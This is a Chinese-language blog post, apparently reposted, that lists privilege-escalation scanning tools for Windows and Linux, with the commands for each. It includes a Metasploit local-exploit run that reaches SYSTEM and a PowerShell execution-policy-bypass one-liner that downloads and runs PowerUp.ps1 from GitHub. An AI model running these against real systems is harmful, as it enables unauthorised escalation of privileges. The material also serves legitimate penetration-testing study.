干货 | Windows/Linux下常用的提权扫描辅助工具总结

margin

​原文链接：干货 | Windows/Linux下常用的提权扫描辅助工具总结 (qq.com)
使用Windows-Exploit-Suggester解析systeminfo下载地址：https://github.com/AonCyberLabs/Windows-Exploit-Suggester
./windows-exploit-suggester.py
使用Linux-Exploit-Suggester.sh寻找linux提权问题下载地址：https://github.com/mzet-/linux-exploit-suggester
./linux-exploit-suggester.sh
使用Sherlock工具下载地址：https://github.com/rasta-mouse/Sherlock
Import-Module Sherlock.ps1Find-AllVulns
使用MSF查询补丁和可利用提权漏洞

1. #查询补丁
   
2. 
   
3. meterpreter> run post/windows/gather/enum_patches
   
4. [+] KB2999226 installed on 11/25/2020
   
5. [+] KB976902 installed on 11/21/2010
   

复制代码

1. #查询Exp
   
2. 
   
3. msf> use post/multi/recon/local_exploit_suggester
   
4. msf> set LHOST <攻击机IP>
   
5. msf> set SESSION <session_id>
   
6. msf> run

复制代码

1. # 利用示例
   
2. 
   
3. msf> use exploit/windows/local/cve_2019_1458_wizardopium
   
4. msf> set SESSION <session_id>
   
5. msf> run
   
6. meterpreter> getuid
   
7. Server username: NT AUTHORITY\SYSTEM

复制代码

使用powerup检查提权漏洞

1. powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
   
2. powershell.exe -nop -exec bypass -c "IEX (New-object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"

复制代码

使用accesschk.exe对系统扫描发现高权限可执行程序，且能够被低权限用户更改

1. accesschk "d:\dir"

复制代码

查看所有用户在d盘dir路径的子路径的权限

1. accesschk "Administrator "d:\dir"
   

复制代码

查看Administrator用户在d盘dir路径的子路径的权限

1. accesschk Administrators -c *
   

复制代码

查看Administrators组对所有服务的权限

1. accesschk -k Guest hklm\software
   

复制代码

查看Guest用户对hklm\software注册表的权限

1. accesschk -ou User
   

复制代码

查看User用户对全局对象的权限
查找主机上具有的CVE，查找具有公开EXP的CVE的Python脚本下载地址：https://github.com/chroblert/WindowsVulnScan

1. .\KBCollect.ps1
   
2. python3 -m pip install requirements.txt
   
3. cve-check.py -u

复制代码

查看具有公开EXP的CVE

1. <pre class="cke_widget_element" data-cke-widget-data="%7B%22code%22%3A%22.%5C%5CKBCollect.ps1%5Cnpython3%C2%A0-m%C2%A0pip%C2%A0install%C2%A0requirements.txt%5Cncve-check.py%C2%A0-u%5Cn%5Cn%E6%9F%A5%E7%9C%8B%E5%85%B7%E6%9C%89%E5%85%AC%E5%BC%80EXP%E7%9A%84CVE%5Cncve-check.py%C2%A0-C%C2%A0-f%C2%A0KB.json%22%2C%22classes%22%3Anull%7D" data-cke-widget-keep-attr="0" data-cke-widget-upcasted="1" data-widget="codeSnippet"><code class="hljs">cve-check.py -C -f KB.json</code></pre>
   
2. <span class="cke_reset cke_widget_drag_handler_container" style="background: url(" https:="" csdnimg.cn="" release="" blog_editor_html="" release2.0.8="" ckeditor="" plugins="" widget="" images="" handle.png")="" rgba(220,="" 220,="" 0.5);="" top:="" 0px;="" left:="" 0px;"=""></span>

复制代码

在线提权漏洞检测平台极光无限出品的安全扫描仪，在提权方面，基于其强大的安全检测能力，能够给出专业的修复建议，有效验证和加固网络资产漏洞。
查询地址：https://detect.secwx.com/
提权辅助网页在Windows提权的时候，对比补丁找Exp很烦吧？这个网站数据源每周更新一次，值得推荐
查询地址：http://bugs.hacking8.com/tiquan/
​